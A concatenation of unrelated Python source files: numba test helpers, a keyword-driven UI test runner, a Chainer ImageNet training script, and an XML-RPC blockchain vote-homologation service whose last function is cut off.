return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.targets import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
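# Hedged usage sketch: capture output written to the C-level stdout (for
# example by printf calls in compiled code); read the wrapped pipe after the
# block exits so that the write end has already been closed:
#
#   with redirect_c_stdout() as fcap:
#       run_something_that_prints_from_c()   # illustrative call
#   text = fcap.read()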
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The child process's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success, 1 if an exception was raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
|
kw_runner.py
|
import threading
import time
import datetime
import sys
from os.path import dirname, abspath, pardir, join
import logging
from uitester.test_manager import utils
from uitester.test_manager import device_proxy
from uitester.test_manager import reflection_proxy
from uitester.test_manager import local_proxy
from uitester.test_manager import context
from uitester.test_manager import adb
from uitester.test_manager import path_helper
from uitester.task_redord_manager import task_record_manager
import traceback
_MAX_LENGTH = 80
logger = logging.getLogger('Tester')
script_dir = dirname(abspath(__file__))
libs_dir = join(join(join(script_dir, pardir), pardir), 'libs')
sys.path.append(libs_dir)
class StatusMsg:
TEST_START = 1
TEST_END = 2
CASE_START = 101
CASE_END = 102
KW_LINE_START = 201
KW_LINE_END = 202
ERROR = 500
INSTALL_START = 601
INSTALL_FINISH = 602
INSTALL_FAIL = 603
AGENT_START = 701
AGENT_STOP = 702
AGENT_ERROR = 703
__status_str__ = {
TEST_START: 'TEST START',
TEST_END: 'TEST END',
CASE_START: 'CASE START',
CASE_END: 'CASE END',
KW_LINE_START: 'KW LINE START',
KW_LINE_END: 'KW LINE END',
ERROR: 'ERROR',
INSTALL_START: 'INSTALL START',
INSTALL_FINISH: 'INSTALL FINISH',
INSTALL_FAIL: 'INSTALL FAIL',
AGENT_START: 'AGENT START',
AGENT_STOP: 'AGENT STOP',
AGENT_ERROR: 'AGENT ERROR'
}
def __init__(self, status, device_id=None, case_id=0, line_number=0, message=None):
self.device_id = device_id
self.status = status
self.case_id = case_id
self.line_number = line_number
self.message = message
def __str__(self):
message = self.message if self.message else ''
return '{} case_id={} line_number={} message:\n {}'\
.format(self.__status_str__[self.status], self.case_id, self.line_number, message)
class KWRunningStatusListener:
"""
TestCase running status listener
"""
def update(self, msg):
"""
Called by the test runner whenever its running status changes.
:param msg: StatusMsg
:return:
"""
pass
class RunSignal:
stop = False
class DataRow:
@classmethod
def from_row(cls, headers, data_row):
data_dict = {}
for index, header in enumerate(headers):
data_dict[header] = data_row[index]
data = cls()
data.__dict__ = data_dict
return data
@classmethod
def from_list(cls, headers, data_rows):
rows = []
for row in data_rows:
rows.append(cls.from_row(headers, row))
return rows
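# Hedged illustration of DataRow: each data row becomes an object whose
# attributes are named after the header columns:
#
#   rows = DataRow.from_list(['name', 'count'], [['alpha', '1'], ['beta', '2']])
#   rows[0].name    # 'alpha'
#   rows[1].count   # '2'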
class KWRunner:
def __init__(self, status_listener=None, device_manager=None):
self.listener = status_listener
self.run_signal = RunSignal()
self.dm = device_manager
def execute(self, cases, devices):
self.run_signal.stop = False
self.dm.selected_devices[0].agent = None
for device in devices:
t = threading.Thread(target=self._run_cases_on_device, args=(cases, device))
t.start()
def _run_cases_on_device(self, cases, device):
self.listener.update(StatusMsg(StatusMsg.INSTALL_START, device_id=device.id))
try:
self.dm.install_agent(device)
except Exception:
self.listener.update(
StatusMsg(
StatusMsg.INSTALL_FAIL,
device_id=device.id,
message=traceback.format_exc()
))
return
self.listener.update(StatusMsg(StatusMsg.INSTALL_FINISH, device_id=device.id))
self.listener.update(StatusMsg(
StatusMsg.TEST_START,
device_id=device.id
))
recorder = task_record_manager.get_task_recorder()
for _case in cases:
core = KWCore()
core.case_id = _case.id
try:
self.dm.start_agent(device)
self.listener.update(StatusMsg(
StatusMsg.AGENT_START,
device_id=device.id
))
context.agent = device.agent
if len(_case.data) >= 2:
data_rows = DataRow.from_list(_case.data[0], _case.data[1:])
for data_row in data_rows:
core.reset()
core.set_data(data_row)
core.parse(_case.content)
core.execute(context.agent, self.listener, recorder=recorder)
else:
core.parse(_case.content)
core.execute(context.agent, self.listener, recorder=recorder)
except Exception:
trace = traceback.format_exc()
if self.listener:
self.listener.update(StatusMsg(
StatusMsg.ERROR,
device_id=device.id,
case_id=_case.id,
line_number=core.line_count,
message=trace
))
logger.debug('KWRunner: Run case failed. Catch exception\n'+trace)
self.dm.stop_agent(device)
self.listener.update(StatusMsg(
StatusMsg.TEST_END,
device_id=device.id
))
def stop(self):
self.run_signal.stop = True
class KWDebugRunner:
def __init__(self, device_manager, data=None, status_listener=None):
self.dm = device_manager
self.listener = status_listener
self.run_signal = RunSignal()
self.core = KWCore(self.run_signal)
self._data = data
@property
def data(self):
return self._data
@data.setter
def data(self, data):
if data is None:
return
if len(data) < 2:
raise ValueError('DebugRunner: Empty data list')
self._data = DataRow.from_list(data[0], data[1:])
def reset(self):
self.core.reset()
self._data = None
self.run_signal.stop = False
def parse(self, script_str):
self.core.parse(script_str)
def execute(self, script_str=None, data_line=0):
self.dm.selected_devices[0].agent = None
t = threading.Thread(target=self._thread_execute, args=(script_str, data_line))
t.start()
def _thread_execute(self, script_str=None, data_line=0):
device = self.dm.selected_devices[0]
# Install agent
self.listener.update(StatusMsg(
StatusMsg.INSTALL_START,
device_id=device.id
))
try:
self.dm.install_agent(device)
except Exception:
self.listener.update(StatusMsg(
StatusMsg.INSTALL_FAIL,
device_id=device.id,
message=traceback.format_exc()
))
return
self.listener.update(StatusMsg(
StatusMsg.INSTALL_FINISH,
device_id=device.id
))
# Start agent
try:
self.dm.start_agent(device)
except Exception:
self.listener.update(StatusMsg(
StatusMsg.AGENT_ERROR,
device_id=device.id,
message=traceback.format_exc()
))
return
self.listener.update(StatusMsg(
StatusMsg.AGENT_START,
device_id=device.id
))
try:
if data_line == 0:
if self.data is None or len(self.data) < 2:
self._execute(script_str=script_str)
else:
for data_row in self.data:
self._execute(script_str=script_str, data_row=data_row)
else:
# data_line_number = data_line-1
# run single data line
self._execute(script_str=script_str, data_row=self.data[data_line-1])
except Exception as e:
if self.listener:
self.listener.update(StatusMsg(
StatusMsg.ERROR,
device_id=context.agent.device_id,
line_number=self.core.line_count,
message=e
))
self.dm.selected_devices[0].agent.close()
def _execute(self, script_str=None, data_row=None):
self.run_signal.stop = False
if script_str:
self.core.reset()
self.core.set_data(data_row)
self.core.parse(script_str)
agent = self.dm.selected_devices[0].agent
self.core.execute(agent, self.listener)
def stop(self):
self.run_signal.stop = True
def get_var(self, var_name):
if var_name == '':
return self.core.kw_var.keys()
res = []
for v_name in self.core.kw_var:
if var_name in v_name:
res.append(v_name)
return res
def get_func(self, func_name):
if func_name == '':
return self.core.kw_func
res = {}
for f_name in self.core.kw_func:
if func_name in f_name:
res[f_name] = self.core.kw_func[f_name]
return res
def get_property(self, var_name, property_name):
var = self.core.kw_var.get(var_name)
if not var:
return ['id', 'class', 'text']
        return filter(lambda x: not x.startswith('__') and property_name in x, var.__dict__.keys())
class KWCore:
AS = 'as'
QUOTE = '"'
SPACE = ' '
COMMENT = '#'
DOT = '.'
VAR = '$'
DATA = 'data'
def __init__(self, run_signal=None):
self.default_func = {
'import': self._import,
'check': self._check,
'assert_true': self.assert_true,
'assert_false': self.assert_false,
'assert_equal': self.assert_equal,
'assert_not_equal': self.assert_not_equal,
'assert_less': self.assert_less,
'assert_less_equal': self.assert_less_equal,
'assert_greater': self.assert_greater,
'assert_greater_equal': self.assert_greater_equal,
'assert_is_none': self.assert_is_none,
'assert_is_not_none': self.assert_is_not_none
}
self.kw_func = {**self.default_func}
self.kw_var = {}
self.kw_lines = []
self.status_listener = None
self.line_count = 0
self.case_id = 0
self.run_signal = run_signal
self._have_record_res = False
def reset(self):
"""
        Reset the core: clear all registered functions, variables, the status listener and the line count.
"""
self.kw_func = {**self.default_func}
self.kw_var = {}
self.kw_lines = []
self.status_listener = None
self.line_count = 0
self.case_id = 0
if self.run_signal:
self.run_signal.stop = False
self._have_record_res = False
def set_data(self, data_row):
self.kw_var[self.DATA] = data_row
def parse(self, script_str):
"""
parse keywords script
It will raise exceptions while parse fail
"""
lines = script_str.split('\n')
for line in lines:
self.parse_line(line.strip())
def parse_line(self, line):
"""
parse single keywords script line
"""
# set line number
self.line_count += 1
if len(line) == 0:
return
# parse line to kw line
kw_line = self._parse_line(line, line_number=self.line_count)
if kw_line.is_comment:
return
func = kw_line.items[0]
# pre import lib
if func == 'import':
self.default_func['import'](*kw_line.items[1:])
if func not in self.kw_func and func not in self.kw_var:
            raise ValueError('Definition not found: {}'.format(func), kw_line.line_number)
# set var
if kw_line.var:
self.kw_var[kw_line.var] = None
# add kw line to cache
self.kw_lines.append(kw_line)
def execute(self, agent, listener, thread=False, recorder=None):
if thread:
threading.Thread(target=self._execute, args=(agent, listener, recorder)).start()
else:
self._execute(agent, listener, recorder)
# stop app
if 'finish_app' in self.kw_func:
self.kw_func['finish_app']()
def _execute(self, agent, listener, recorder):
start_time = datetime.datetime.now()
self.status_listener = listener
context.agent = agent
# run all kw line in cache
if self.status_listener:
# -- Case start --
self.status_listener.update(StatusMsg(
StatusMsg.CASE_START,
device_id=agent.device_id,
case_id=self.case_id
))
for line in self.kw_lines:
if self.status_listener:
# -- Line start --
self.status_listener.update(StatusMsg(
StatusMsg.KW_LINE_START,
device_id=agent.device_id,
line_number=line.line_number,
case_id=self.case_id
))
try:
if self.run_signal and self.run_signal.stop:
logger.debug('KWCore._execute : User stop test')
break
self._execute_line(line)
except Exception as e:
if self.status_listener:
# -- Error --
self.status_listener.update(StatusMsg(
StatusMsg.ERROR,
device_id=agent.device_id,
line_number=line.line_number,
case_id=self.case_id,
message=e
))
# if case line execute failed. stop this case and run next one
if self.status_listener:
# -- Line end --
self.status_listener.update(StatusMsg(
StatusMsg.KW_LINE_END,
device_id=agent.device_id,
line_number=line.line_number,
case_id=self.case_id
))
if recorder:
trace = traceback.format_exc()
recorder.add_record(self.case_id, agent.device_id, start_time, -1, trace)
self._have_record_res = True
break
if self.status_listener:
# -- Line end --
self.status_listener.update(StatusMsg(
StatusMsg.KW_LINE_END,
device_id=agent.device_id,
line_number=line.line_number,
case_id=self.case_id
))
if self.status_listener:
# -- Case end --
self.status_listener.update(StatusMsg(
StatusMsg.CASE_END,
device_id=agent.device_id,
case_id=self.case_id
))
if recorder and not self._have_record_res:
recorder.add_record(self.case_id, agent.device_id, start_time, 0, '')
def _import(self, module_name):
"""
        Import a python lib from the .libs dir.
        After the import, you can call any function in the lib by writing its name.
        ------------
        e.g.:
        import example
        test_str
        ------------
        line 1. Import the python lib named example from the libs dir.
        line 2. Call the function test_str() in example.
"""
# load keywords
kw = __import__('keywords')
# set real rpc proxy
kw.var_cache['proxy'] = device_proxy
kw.var_cache['reflection'] = reflection_proxy
kw.var_cache['local'] = local_proxy
# load script
__import__(module_name)
# register all kw func from keywords.kw_func
self.kw_func.update(kw.kw_func)
def _check(self, expected, actual):
"""
Assert if arg1 equals arg2
e.g. :
check some_view.text some_text
if this view's text is not some_text, then this case will be record as failed
"""
assert expected == actual, 'Assert fail. expected={} but actual={}'.format(expected, actual)
def assert_false(self, expr):
"""Check that the expression is false."""
if expr:
raise AssertionError('%s is not false' % str(expr))
def assert_true(self, expr, msg=None):
"""Check that the expression is true."""
if not expr:
raise AssertionError('%s is not true' % str(expr))
def assert_equal(self, first, second):
"""Fail if the two objects are unequal as determined by the '=='
operator.
"""
if first != second:
raise AssertionError('%s and %s not equal' % (str(first), str(second)))
def assert_not_equal(self, first, second):
"""Fail if the two objects are equal as determined by the '!='
operator.
"""
        if first == second:
            raise AssertionError('%s and %s are equal' % (str(first), str(second)))
def assert_less(self, a, b):
"""Just like self.assertTrue(a < b), but with a nicer default message."""
if not a < b:
raise AssertionError('%s not less than %s' % (str(a), str(b)))
def assert_less_equal(self, a, b):
"""Just like self.assertTrue(a <= b), but with a nicer default message."""
if not a <= b:
raise AssertionError('%s not less than or equal to %s' % (str(a), str(b)))
def assert_greater(self, a, b):
"""Just like self.assertTrue(a > b), but with a nicer default message."""
if not a > b:
raise AssertionError('%s not greater than %s' % (str(a), str(b)))
def assert_greater_equal(self, a, b):
"""Just like self.assertTrue(a >= b), but with a nicer default message."""
if not a >= b:
raise AssertionError('%s not greater than or equal to %s' % (str(a), str(b)))
def assert_is_none(self, obj):
"""Same as self.assertTrue(obj is None), with a nicer default message."""
if obj is not None:
raise AssertionError('%s is not None' % (str(obj),))
def assert_is_not_none(self, obj):
"""Included for symmetry with assertIsNone."""
if obj is None:
raise AssertionError('unexpectedly None')
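    # Illustrative keyword-script usage of the assertions above ('find_view' and the
    # 'text'/'enabled' attributes are hypothetical and would come from an imported lib;
    # 'check' and 'assert_true' are defaults registered in __init__):
    #
    #   find_view "login_button" as btn
    #   check $btn.text "Login"
    #   assert_true $btn.enabled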
def _execute_line(self, kw_line):
if kw_line.is_comment:
# comment line
return
elif kw_line.items[0] == 'import':
# import has been executed while parse line
return
logger.debug('exec items {}'.format(kw_line.items))
# make args, change var name to var object
args = []
for item in kw_line.items[1:]:
if type(item) is int:
args.append(item)
elif type(item) is str and item.startswith(self.VAR):
arg_str = item[1:]
index = arg_str.find(self.DOT)
if index == -1:
args.append(self.kw_var[arg_str])
else:
var = self.kw_var[arg_str[:index]]
args.append(getattr(var, arg_str[index+1:]))
else:
args.append(item)
# execute keyword function
res = self.kw_func[kw_line.items[0]](*args)
# set response as var
if kw_line.var:
self.kw_var[kw_line.var] = res
def _parse_line(self, kw_line, line_number=0):
line = KWLine(raw=kw_line, line_number=line_number)
if kw_line.strip().startswith(self.COMMENT):
line.is_comment = True
return line
kw_items = []
cache = ''
in_quotation = False
var = None
for char in kw_line:
if char == self.SPACE and not in_quotation and cache:
kw_items.append(cache.strip())
cache = ''
elif char == self.QUOTE:
in_quotation = not in_quotation
cache += char
else:
if not cache:
cache = char
else:
cache += char
if len(cache) > 0:
kw_items.append(cache.strip())
if in_quotation:
raise ValueError('Missing quote. {}'.format(kw_line), line_number)
if self.AS in kw_items:
as_index = kw_items.index(self.AS)
if as_index < (len(kw_items) - 2):
raise ValueError('Keywords "as" should only set one variable', line_number)
elif as_index == (len(kw_items) - 1):
raise ValueError('Keywords "as" need one variable after it', line_number)
else:
var = kw_items[as_index + 1]
if var.find(self.QUOTE) != -1:
raise ValueError('Keywords "as" parse error. var name should not have any " in it.')
kw_items = kw_items[:as_index]
for index, item in enumerate(kw_items):
if item.startswith(self.VAR) and len(item) > 1 and item[1:] not in self.kw_var:
if '.' in item:
split_item = item[1:].split('.')
if split_item[0] not in self.kw_var:
raise ValueError('Var {} not defined'.format(item[1:]))
else:
if item[1:] not in self.kw_var:
raise ValueError('Var {} not defined'.format(item[1:]))
elif item.find('"') == -1:
# if kw item is int
try:
kw_items[index] = int(item)
except ValueError:
pass
else:
item = item.replace('"', '')
kw_items[index] = item
line.items = kw_items
line.var = var
return line
class KWLine:
def __init__(self, raw=None, line_number=0):
self.is_comment = False
self.items = []
self.raw = raw
self.line_number = line_number
self.var = None
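# A minimal, hypothetical usage sketch of the keyword engine above (not part of the
# original runner flow): it registers a fake 'echo' keyword instead of going through
# 'import', parses one script line and executes it directly, so no device agent is needed.
if __name__ == '__main__':
    core = KWCore()
    core.kw_func['echo'] = lambda text: text.upper()  # hypothetical keyword function
    core.parse('echo "hello world" as greeting')
    core._execute_line(core.kw_lines[0])
    print(core.kw_var['greeting'])  # -> HELLO WORLD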
|
train_imagenet.py
|
#!/usr/bin/env python
"""Example code of learning a large scale convnet from ILSVRC2012 dataset.
Prerequisite: To run this example, crop the center of ILSVRC2012 training and
validation images and scale them to 256x256, and make two lists of space-
separated CSV whose first column is full path to image and second column is
zero-origin label (this format is same as that used by Caffe's ImageDataLayer).
"""
from __future__ import print_function
import argparse
import datetime
import json
import multiprocessing
import random
import sys
import threading
import time
import numpy as np
from PIL import Image
import six
import six.moves.cPickle as pickle
from six.moves import queue
from chainer import computational_graph as c
from chainer import cuda
from chainer import optimizers
parser = argparse.ArgumentParser(
description='Learning convnet from ILSVRC2012 dataset')
parser.add_argument('train', help='Path to training image-label list file')
parser.add_argument('val', help='Path to validation image-label list file')
parser.add_argument('--mean', '-m', default='mean.npy',
help='Path to the mean file (computed by compute_mean.py)')
parser.add_argument('--arch', '-a', default='nin',
help='Convnet architecture \
(nin, alexbn, googlenet, googlenetbn)')
parser.add_argument('--batchsize', '-B', type=int, default=32,
help='Learning minibatch size')
parser.add_argument('--val_batchsize', '-b', type=int, default=250,
help='Validation minibatch size')
parser.add_argument('--epoch', '-E', default=10, type=int,
help='Number of epochs to learn')
parser.add_argument('--gpu', '-g', default=-1, type=int,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--loaderjob', '-j', default=20, type=int,
help='Number of parallel data loading processes')
parser.add_argument('--out', '-o', default='model',
help='Path to save model on each validation')
args = parser.parse_args()
if args.gpu >= 0:
cuda.check_cuda_available()
xp = cuda.cupy if args.gpu >= 0 else np
assert 50000 % args.val_batchsize == 0
def load_image_list(path):
tuples = []
for line in open(path):
pair = line.strip().split()
tuples.append((pair[0], np.int32(pair[1])))
return tuples
# Prepare dataset
train_list = load_image_list(args.train)
val_list = load_image_list(args.val)
mean_image = pickle.load(open(args.mean, 'rb'))
# Prepare model
if args.arch == 'nin':
import nin
model = nin.NIN()
elif args.arch == 'alexbn':
import alexbn
model = alexbn.AlexBN()
elif args.arch == 'googlenet':
import googlenet
model = googlenet.GoogLeNet()
elif args.arch == 'googlenetbn':
import googlenetbn
model = googlenetbn.GoogLeNetBN()
else:
raise ValueError('Invalid architecture name')
if args.gpu >= 0:
cuda.get_device(args.gpu).use()
model.to_gpu()
# Setup optimizer
optimizer = optimizers.MomentumSGD(lr=0.01, momentum=0.9)
optimizer.setup(model)
# ------------------------------------------------------------------------------
# This example consists of three threads: data feeder, logger and trainer.
# These communicate with each other via Queue.
data_q = queue.Queue(maxsize=1)
res_q = queue.Queue()
cropwidth = 256 - model.insize
def read_image(path, center=False, flip=False):
# Data loading routine
image = np.asarray(Image.open(path)).transpose(2, 0, 1)
if center:
        top = left = cropwidth // 2
else:
top = random.randint(0, cropwidth - 1)
left = random.randint(0, cropwidth - 1)
bottom = model.insize + top
right = model.insize + left
image = image[:, top:bottom, left:right].astype(np.float32)
image -= mean_image[:, top:bottom, left:right]
image /= 255
if flip and random.randint(0, 1) == 0:
return image[:, :, ::-1]
else:
return image
def feed_data():
# Data feeder
i = 0
count = 0
x_batch = np.ndarray(
(args.batchsize, 3, model.insize, model.insize), dtype=np.float32)
y_batch = np.ndarray((args.batchsize,), dtype=np.int32)
val_x_batch = np.ndarray(
(args.val_batchsize, 3, model.insize, model.insize), dtype=np.float32)
val_y_batch = np.ndarray((args.val_batchsize,), dtype=np.int32)
batch_pool = [None] * args.batchsize
val_batch_pool = [None] * args.val_batchsize
pool = multiprocessing.Pool(args.loaderjob)
data_q.put('train')
for epoch in six.moves.range(1, 1 + args.epoch):
print('epoch', epoch, file=sys.stderr)
print('learning rate', optimizer.lr, file=sys.stderr)
perm = np.random.permutation(len(train_list))
for idx in perm:
path, label = train_list[idx]
batch_pool[i] = pool.apply_async(read_image, (path, False, True))
y_batch[i] = label
i += 1
if i == args.batchsize:
for j, x in enumerate(batch_pool):
x_batch[j] = x.get()
data_q.put((x_batch.copy(), y_batch.copy()))
i = 0
count += 1
if count % 100000 == 0:
data_q.put('val')
j = 0
for path, label in val_list:
val_batch_pool[j] = pool.apply_async(
read_image, (path, True, False))
val_y_batch[j] = label
j += 1
if j == args.val_batchsize:
for k, x in enumerate(val_batch_pool):
val_x_batch[k] = x.get()
data_q.put((val_x_batch.copy(), val_y_batch.copy()))
j = 0
data_q.put('train')
optimizer.lr *= 0.97
pool.close()
pool.join()
data_q.put('end')
def log_result():
# Logger
train_count = 0
train_cur_loss = 0
train_cur_accuracy = 0
begin_at = time.time()
val_begin_at = None
while True:
result = res_q.get()
if result == 'end':
print(file=sys.stderr)
break
elif result == 'train':
print(file=sys.stderr)
train = True
if val_begin_at is not None:
begin_at += time.time() - val_begin_at
val_begin_at = None
continue
elif result == 'val':
print(file=sys.stderr)
train = False
val_count = val_loss = val_accuracy = 0
val_begin_at = time.time()
continue
loss, accuracy = result
if train:
train_count += 1
duration = time.time() - begin_at
throughput = train_count * args.batchsize / duration
sys.stderr.write(
'\rtrain {} updates ({} samples) time: {} ({} images/sec)'
.format(train_count, train_count * args.batchsize,
datetime.timedelta(seconds=duration), throughput))
train_cur_loss += loss
train_cur_accuracy += accuracy
if train_count % 1000 == 0:
mean_loss = train_cur_loss / 1000
mean_error = 1 - train_cur_accuracy / 1000
print(file=sys.stderr)
print(json.dumps({'type': 'train', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
train_cur_loss = 0
train_cur_accuracy = 0
else:
val_count += args.val_batchsize
duration = time.time() - val_begin_at
throughput = val_count / duration
sys.stderr.write(
'\rval {} batches ({} samples) time: {} ({} images/sec)'
.format(val_count / args.val_batchsize, val_count,
datetime.timedelta(seconds=duration), throughput))
val_loss += loss
val_accuracy += accuracy
if val_count == 50000:
mean_loss = val_loss * args.val_batchsize / 50000
mean_error = 1 - val_accuracy * args.val_batchsize / 50000
print(file=sys.stderr)
print(json.dumps({'type': 'val', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
def train_loop():
# Trainer
graph_generated = False
while True:
while data_q.empty():
time.sleep(0.1)
inp = data_q.get()
if inp == 'end': # quit
res_q.put('end')
break
elif inp == 'train': # restart training
res_q.put('train')
train = True
continue
elif inp == 'val': # start validation
res_q.put('val')
pickle.dump(model, open(args.out, 'wb'), -1)
train = False
continue
x = xp.asarray(inp[0])
y = xp.asarray(inp[1])
if train:
optimizer.zero_grads()
loss, accuracy = model.forward(x, y)
loss.backward()
optimizer.update()
if not graph_generated:
with open('graph.dot', 'w') as o:
o.write(c.build_computational_graph((loss,), False).dump())
with open('graph.wo_split.dot', 'w') as o:
o.write(c.build_computational_graph((loss,), True).dump())
print('generated graph')
graph_generated = True
else:
loss, accuracy = model.forward(x, y, train=False)
res_q.put((float(loss.data),
float(accuracy.data)))
del loss, accuracy, x, y
# Invoke threads
feeder = threading.Thread(target=feed_data)
feeder.daemon = True
feeder.start()
logger = threading.Thread(target=log_result)
logger.daemon = True
logger.start()
train_loop()
feeder.join()
logger.join()
# Save final model
pickle.dump(model, open(args.out, 'wb'), -1)
|
homologator.py
|
from block import Block, Transaction
from blockchain import Blockchain
import xmlrpc.server
import xmlrpc.client
import logging
import threading
from random import randint
from api import *
import sys
class Homologator(xmlrpc.server.SimpleXMLRPCServer):
def __init__(self, addr):
super().__init__(addr, logRequests=False, allow_none=True)
self.addr = addr
self.shutdown_condition = threading.Condition()
self.shutdown_event = threading.Event()
self._register_functions()
self._create_logger()
def start(self):
self.server_thread = threading.Thread(target=self.serve_forever)
self.server_thread.start()
def serve_forever(self):
base_thread = threading.Thread(target=super().serve_forever)
base_thread.start()
with self.shutdown_condition:
self.shutdown_condition.wait_for(self.shutdown_event.is_set)
self.shutdown()
def shutdown(self):
self.logger.info('Shutting down')
super().shutdown()
        self.logger.info('Shutdown successful')
def _register_functions(self):
self.register_introspection_functions()
self.register_instance(HomologatorService(self))
def _create_logger(self):
self.logger = logger_factory('Homologator',
'Homologator.log')
self.logger.info('Ready')
class HomologatorService:
def __init__(self, homologator: Homologator):
self.homologator = homologator
self.port = self.homologator.addr[1]
self.logger = logging.getLogger('Homologator')
self.candidates = []
self.candidate_number = dict()
self.candidate_parties = dict()
self._get_candidates()
self.blockchain_candidates = []
self.number_candidates = len(self.candidate_number)
for i in range(self.number_candidates):
bc = Blockchain(i)
self.blockchain_candidates.append(bc)
def shutdown(self):
self.logger.info('Setting shutdown event')
self.homologator.shutdown_event.set()
with self.homologator.shutdown_condition:
self.homologator.shutdown_condition.notify()
def homologate_vote(self, vote: Vote):
self.logger.info('Received vote to homologate')
self.add_vote(vote)
return 'Vote homologated'
def add_vote(self, vote):
candidate_position = self.candidate_number[vote['candidate']]
transaction = Transaction(vote['name'], vote['cpf'])
self.blockchain_candidates[candidate_position].add_pending(transaction)
self.blockchain_candidates[candidate_position].build_block()
def show_all_blockchains(self):
for blockchain_candidate in self.blockchain_candidates:
for block in blockchain_candidate.blockchain:
print(block)
print(len(blockchain_candidate.blockchain))
def get_election_winner(self):
self.logger.info('Received request to send the winner of the election')
max_chain_length = 0
name_candidate = ''
for blockchain_candidate in self.blockchain_candidates:
if (max_chain_length < len(blockchain_candidate.blockchain) - 1) and blockchain_candidate.is_valid():
max_chain_length = len(blockchain_candidate.blockchain) - 1
name_candidate = self.candidates[blockchain_candidate.id][0]
return name_candidate
def pass_blockchains_to_new_homologator(self, candidate: int):
self.logger.info(f'Passing the candidate {candidate} transactions to a new homologator')
return [block.transactions for block in self.blockchain_candidates[candidate].blockchain]
def pass_ports(self, ports: list):
self.logger.info('Received homologators ports')
old_homologators = []
for port in ports:
old_homologator = xmlrpc.client.ServerProxy(f'http://localhost:{port}')
old_homologators.append(old_homologator)
for candidate in range(self.number_candidates):
self.logger.info(f'Fetching transactions for candidate {candidate}')
blockchain_candidate = []
for old_homologator in old_homologators:
self.logger.info(f'Fetching from homologator {old_homologator}')
list_transaction = old_homologator.pass_blockchains_to_new_homologator(candidate)
self.logger.info('Constructing blockchain')
bc = Blockchain(candidate)
bc.copy_blocks(list_transaction)
self.logger.info('Blockchain constructed successfully')
blockchain_candidate.append(bc)
self.logger.info('Validating blockchains')
blockchain_candidate = [bc for bc in blockchain_candidate if bc.is_valid()]
biggest_size = max([len(bc.blockchain) for bc in blockchain_candidate])
blockchain_candidate = [bc for bc in blockchain_candidate if len(bc.blockchain) == biggest_size]
self.blockchain_candidates[candidate] = blockchain_candidate[0]
self.logger.info('Blockchains created')
def _get_candidates(self):
        with open('candidates.csv', 'r') as file:
            for idx, line in enumerate(file.readlines()[1:]):
                candidate, party = line.strip().split(',')
                self.candidates.append((candidate, party))
                self.candidate_number[candidate] = idx
                self.candidate_parties[candidate] = party
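# Hypothetical illustration (not used by the service itself): how a local client could
# submit a vote to a running homologator over XML-RPC. It assumes a homologator is
# already listening on the given port and that the vote dict uses the keys read by
# add_vote above; the candidate must exist in candidates.csv.
def _example_cast_vote(port):
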